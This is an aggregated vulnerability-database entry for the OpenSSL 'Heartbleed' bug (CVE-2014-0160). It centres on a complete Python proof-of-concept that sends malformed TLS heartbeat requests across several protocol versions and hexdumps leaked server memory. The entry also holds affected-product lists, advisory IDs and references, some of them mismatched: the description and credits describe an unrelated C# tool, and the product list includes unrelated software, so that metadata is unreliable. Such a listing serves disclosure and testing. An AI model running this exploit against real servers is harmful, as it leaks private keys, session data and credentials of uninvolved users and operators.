ID
VAR-E-201404-0108
CVE
cve_id: | CVE-2014-0160 | Trust: 9.6 |
cve_id: | CVE-2014-0346 | Trust: 1.0 |
EDB ID
32764
TITLE
OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions) - Multiple remote Exploit
Trust: 1.0
DESCRIPTION
Bleed Out is a command line tool written in C# for targeting instances of OpenSSL made vulnerable by the prolific "Heartbleed" bug. The tool aggressively exploits the OpenSSL vulnerability, dumping both ASCII and binary data to files. It also checks the uniqueness of each chunk before persisting it, to ensure that duplicate chunks are not saved.
Trust: 1.5
AFFECTED PRODUCTS
vendor: | openssl | model: | 1.0.1f tls heartbeat extension | scope: | - | version: | - | Trust: 1.6 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4 | Trust: 0.6 |
vendor: | tls | model: | heartbeat | scope: | - | version: | - | Trust: 0.5 |
vendor: | heartbleed | model: | openssl information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | mass | model: | bleed | scope: | eq | version: | 20140423 | Trust: 0.5 |
vendor: | heartbleed | model: | tls/dtls information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | openssl | model: | tls heartbeat extension memory | scope: | - | version: | - | Trust: 0.5 |
vendor: | heartbleed | model: | mass testing script | scope: | - | version: | - | Trust: 0.5 |
vendor: | heartbleed | model: | user session extraction | scope: | - | version: | - | Trust: 0.5 |
vendor: | streamworks | model: | job scheduler release | scope: | eq | version: | 7 | Trust: 0.5 |
vendor: | bleed | model: | out heartbleed command line tool | scope: | eq | version: | 1.0.0.10 | Trust: 0.5 |
vendor: | heartbleed | model: | - | scope: | - | version: | - | Trust: 0.5 |
vendor: | bleed | model: | out heartbleed command line tool | scope: | eq | version: | 1.0.0.0 | Trust: 0.5 |
vendor: | bleed | model: | out heartbleed command line tool | scope: | eq | version: | 1.0.1.46 | Trust: 0.5 |
vendor: | openssl | model: | heartbeat information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.3 |
vendor: | red | model: | hat enterprise virtualization hypervisor for rhel | scope: | eq | version: | 60 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux workstation optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.2.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.7.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.6.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.6.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.4 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.4 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.0.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 1.6.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 1.5.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.1.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.7 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | opera | model: | software opera | scope: | eq | version: | 11.10 | Trust: 0.3 |
vendor: | openssl | model: | project openssl 1.0.1c | scope: | - | version: | - | Trust: 0.3 |
vendor: | openssl | model: | project openssl 1.0.1a | scope: | - | version: | - | Trust: 0.3 |
vendor: | openssl | model: | project openssl | scope: | eq | version: | 1.0.1 | Trust: 0.3 |
vendor: | mcafee | model: | security for microsoft exchange | scope: | eq | version: | 7.6 | Trust: 0.3 |
vendor: | mcafee | model: | epolicy orchestrator | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | kerio | model: | control patch | scope: | eq | version: | 7.1.01 | Trust: 0.3 |
vendor: | kerio | model: | control | scope: | eq | version: | 7.1.0 | Trust: 0.3 |
vendor: | ipswitch | model: | imail server | scope: | eq | version: | 11.02 | Trust: 0.3 |
vendor: | ipswitch | model: | imail server | scope: | eq | version: | 11.01 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.2 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.02 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.26 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.9 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.7 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.6 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.5 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.4 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.3 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.2 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.1.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 5.3.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.5 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.4 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.3 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.0 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.0.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.8 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.11 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.10 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.0 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.1.0 | Trust: 0.3 |
vendor: | ibm | model: | tivoli management framework | scope: | eq | version: | 4.1.1 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 8.0.0.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 8.0.0.1 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.6 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.1 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearcase | scope: | eq | version: | 7.1.2.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.5 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless location appliance | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | telepresence video communication server | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cerberus | model: | ftp server | scope: | eq | version: | 4.0.9.8 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | bluecat | model: | networks adonis | scope: | eq | version: | 4.1.43 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | avaya | model: | aura presence services | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | x14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | x14.1 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | x14.0 | Trust: 0.3 |
vendor: | attachmate | model: | reflection suite for | scope: | eq | version: | x14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for unix and openvms | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for the multi-host enterprise pro | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for ibm | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for ibm | scope: | eq | version: | 14 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for hp | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | 14.1 | Trust: 0.3 |
vendor: | attachmate | model: | reflection sp1 | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | apple | model: | airport extreme | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | css11500 content services switch | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ace module | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems policy center | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems packetshaper | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems intelligence center | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems director | scope: | ne | version: | 0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]
# Date: [2014-04-09]
# Exploit Author: [Csaba Fitzl]
# Vendor Homepage: [http://www.openssl.org/]
# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]
# Version: [1.0.1f]
# Tested on: [N/A]
# CVE : [2014-0160]
#!/usr/bin/env python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by Csaba Fitzl for multiple SSL / TLS version support
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
version = []
version.append(['SSL 3.0','03 00'])
version.append(['TLS 1.0','03 01'])
version.append(['TLS 1.1','03 02'])
version.append(['TLS 1.2','03 03'])
def create_hello(version):
hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
return hello
def create_hb(version):
hb = h2bin('18 ' + version + ' 00 03 01 40 00')
return hb
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s,hb):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
for i in range(len(version)):
print 'Trying ' + version[i][0] + '...'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(create_hello(version[i][1]))
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(create_hb(version[i][1]))
if hit_hb(s,create_hb(version[i][1])):
#Stop if vulnerable
break
if __name__ == '__main__':
main()
Trust: 1.0
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
EXPLOIT LANGUAGE
py
Trust: 1.0
PRICE
Free
Trust: 10.8
TYPE
'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)
Trust: 1.0
TAGS
tag: | exploit | Trust: 6.5 |
tag: | proof of concept | Trust: 1.5 |
tag: | shell | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
tag: | python | Trust: 0.5 |
CREDITS
John Leitch
Trust: 1.5
EXTERNAL IDS
db: | NVD | id: | CVE-2014-0160 | Trust: 10.2 |
db: | USCERT | id: | TA14-098A | Trust: 1.7 |
db: | EXPLOIT-DB | id: | 32764 | Trust: 1.6 |
db: | NVD | id: | CVE-2014-0346 | Trust: 1.0 |
db: | 0DAYTODAY | id: | 22118 | Trust: 0.6 |
db: | EDBNET | id: | 21855 | Trust: 0.6 |
db: | EDBNET | id: | 78335 | Trust: 0.6 |
db: | EDBNET | id: | 80511 | Trust: 0.6 |
db: | EDBNET | id: | 54281 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 22129 | Trust: 0.6 |
db: | EDBNET | id: | 21866 | Trust: 0.6 |
db: | PACKETSTORM | id: | 126072 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126308 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126288 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126090 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126065 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126048 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126069 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151177 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126102 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126070 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126100 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126272 | Trust: 0.5 |
db: | PACKETSTORM | id: | 126101 | Trust: 0.5 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01F | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01C | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01B | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01A | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01D | Trust: 0.3 |
db: | ICS CERT ALERT | id: | ICS-ALERT-14-099-01E | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-03 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-02 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-135-05 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-128-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-135-02 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-02A | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-114-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-126-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-15-344-01 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-135-04 | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-03A | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-105-03B | Trust: 0.3 |
db: | ICS CERT | id: | ICSA-14-126-01A | Trust: 0.3 |
db: | CERT/CC | id: | VU#720951 | Trust: 0.3 |
db: | DLINK | id: | SAP10022 | Trust: 0.3 |
db: | JUNIPER | id: | JSA10623 | Trust: 0.3 |
db: | MCAFEE | id: | SB10071 | Trust: 0.3 |
db: | BID | id: | 66690 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2014-0160 | Trust: 9.3 |
url: | https://www.intelligentexploit.com | Trust: 1.2 |
url: | https://nvd.nist.gov/vuln/detail/cve-2014-0346 | Trust: 1.0 |
url: | https://0day.today/exploits/22118 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/32764/ | Trust: 0.6 |
url: | https://0day.today/exploits/22129 | Trust: 0.6 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004581 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020694 | Trust: 0.3 |
url: | http://support.lexmark.com/index?page=content&id=te597&locale=en&userlocale=en_us | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670303 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004608 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-114-01 | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004610 | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100179859 | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=kb29004 | Trust: 0.3 |
url: | http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-332187.htm | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21672075 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/ | Trust: 0.3 |
url: | https://support.software.dell.com/foglight/kb/122982 | Trust: 0.3 |
url: | http://kb.tableausoftware.com/articles/knowledgebase/heartbleed-issue | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020681 | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01e | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04239374 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095202 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670161 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670066 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037392 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-105-02a | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095217 | Trust: 0.3 |
url: | http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21669859 | Trust: 0.3 |
url: | https://blogs.oracle.com/security/entry/heartbleed_cve_2014_0160_vulnerability | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04264271 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670321 | Trust: 0.3 |
url: | http://www.hmailserver.com/devnet/?page=issuetracker_display&issueid=424 | Trust: 0.3 |
url: | https://technet.microsoft.com/en-us/library/security/2962393 | Trust: 0.3 |
url: | https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_aix_is_affected_by_a_vulnerability_in_openssl_cve_2014_0160?lang=en_us | Trust: 0.3 |
url: | http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140409-heartbleed | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671745 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475466 | Trust: 0.3 |
url: | http://community.microfocus.com/microfocus/corba/artix/w/knowledge_base/25633.artix-openssl-heartbleed-vulnerability-fix-available.aspx | Trust: 0.3 |
url: | http://securityadvisories.dlink.com/security/publication.aspx?name=sap10022 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669839 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21676672 | Trust: 0.3 |
url: | https://blog.torproject.org/blog/tor-browser-354-released | Trust: 0.3 |
url: | http://blogs.opera.com/desktop/2014/04/opera-12-17/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671338 | Trust: 0.3 |
url: | https://support.tenable.com/support-center/advisory2.php | Trust: 0.3 |
url: | http://kb.parallels.com/en/121129/?=en | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037381 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04272043 | Trust: 0.3 |
url: | http://www.openssl.org/news/vulnerabilities.html | Trust: 0.3 |
url: | https://openvpn.net/index.php/access-server/download-openvpn-as-sw/532-release-notes-v200.html | Trust: 0.3 |
url: | http://www.kerio.com/kerio-connect-release-history | Trust: 0.3 |
url: | http://www.opera.com/docs/changelogs/windows/1217/ | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-135-02 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669664 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037379 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04236102 | Trust: 0.3 |
url: | https://openvpn.net/index.php/download/community-downloads.html | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/130 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04260505 | Trust: 0.3 |
url: | http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/ | Trust: 0.3 |
url: | https://ics-cert.us-cert.gov/alerts/ics-alert-14-099-01d | Trust: 0.3 |
url: | http://blog.proofpoint.com/2014/04/heartbleed-issue-security-update.html | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095218 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670242 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21670165 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21669763 | Trust: 0.3 |
